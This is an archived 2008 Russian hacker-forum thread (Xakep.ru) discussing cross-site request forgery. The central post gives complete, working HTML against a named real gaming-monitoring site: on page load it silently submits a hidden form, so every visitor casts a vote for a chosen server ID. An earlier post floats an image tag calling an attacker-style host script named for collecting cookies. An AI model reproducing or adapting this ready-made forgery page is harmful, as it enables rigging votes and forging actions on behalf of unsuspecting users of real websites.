Форумы на Хакер

Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.

Статья про XSRF

Пользователи, просматривающие топик: none

Зашли как: Guest

Все форумы >> [Журнал Xakep] >> Статья про XSRF

Имя

Сообщение

<< Старые топики Новые топики >>

Статья про XSRF - 2008-07-26 16:53:42.180000

Xakep9009

Сообщений: 1067
Оценки: 0
Присоединился: 2006-08-28 02:34:39

Да….офигенная статья…..
мне очень понравилось автору респект…….но к сожалению мало примеров….
Да и видео как будто ламер снимал…если бы не музыка под видео было бы ужасно….

Так вот….кто еще что нашол про эксплуатацию этой уязвимости….напишите….я читал wiki и http://www.hackedpro.org/index.php?name=Pages&op=page&pid=56
…а далее все абсолютно скопировано из этой статьи…..
может кто еще предложит статейку про эту уяз….желательно на русском…8D

Post #: 1

RE: Статья про XSRF - 2008-07-27 16:30:51.466666

oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000

А что тебе конкретно не понятно?
Или тебе готовые примеры нужны?

Post #: 2

RE: Статья про XSRF - 2008-07-28 23:55:18.306666

Xakep9009

Сообщений: 1067
Оценки: 0
Присоединился: 2006-08-28 02:34:39

Теория вся понятна…..и в html & php шарю…..но мне бы примерчик с любым сайтом….для полного понимания….неважно какой…..
допустим для смены пароля в учётной записи…..ЛЮБОЙ ПРИМЕР (от себя)

Post #: 3

RE: Статья про XSRF - 2008-07-29 00:48:26.946666

xaxa89

Сообщений: 287
Оценки: 0
Присоединился: 2008-05-18 00:30:38.240000

паясните мне короче типа на странице есть картинка <img src="http://myxak.com/yourcookies.php" > то тогд выполниться мой сценарий http://myxak.com/yourcookies.php а?

Post #: 4

RE: Статья про XSRF - 2008-07-29 01:39:12.056666

Xakep9009

Сообщений: 1067
Оценки: 0
Присоединился: 2006-08-28 02:34:39

именно.

Post #: 5

RE: Статья про XSRF - 2008-07-29 02:56:28.103333

xaxa89

Сообщений: 287
Оценки: 0
Присоединился: 2008-05-18 00:30:38.240000

тема……………

Post #: 6

RE: Статья про XSRF - 2008-07-29 11:59:17.233333

oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000

quote:

паясните мне короче типа на странице есть картинка
<img src="http://myxak.com/yourcookies.php" >
то тогд выполниться мой сценарий http://myxak.com/yourcookies.php а?

выполниться пхп код, но это совсем не XSRF.

quote:

ЛЮБОЙ ПРИМЕР (от себя)

сайт forgamers .ru (мониторинг серверов)
HTML код для автоматического голосования:

&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
 &lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;/head&gt;
 
 &lt;body onload="document.forms['rating'].submit();"&gt;
 &lt;form action="http://www.forgamers.ru/ajax/rate.php" method="post" name="rating"&gt;
 &lt;input name="id" type="hidden" value="ID_СЕРВЕРА" /&gt;&lt;/form&gt;
 
 &lt;/body&gt;
 &lt;/html&gt;

Post #: 7

RE: Статья про XSRF - 2008-07-30 17:33:36.616666

Xakep9009

Сообщений: 1067
Оценки: 0
Присоединился: 2006-08-28 02:34:39

Спасибо огромное теперь моя душа спокойна)))

Post #: 8

Страниц: [1]

Все форумы >> [Журнал Xakep] >> Статья про XSRF

Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.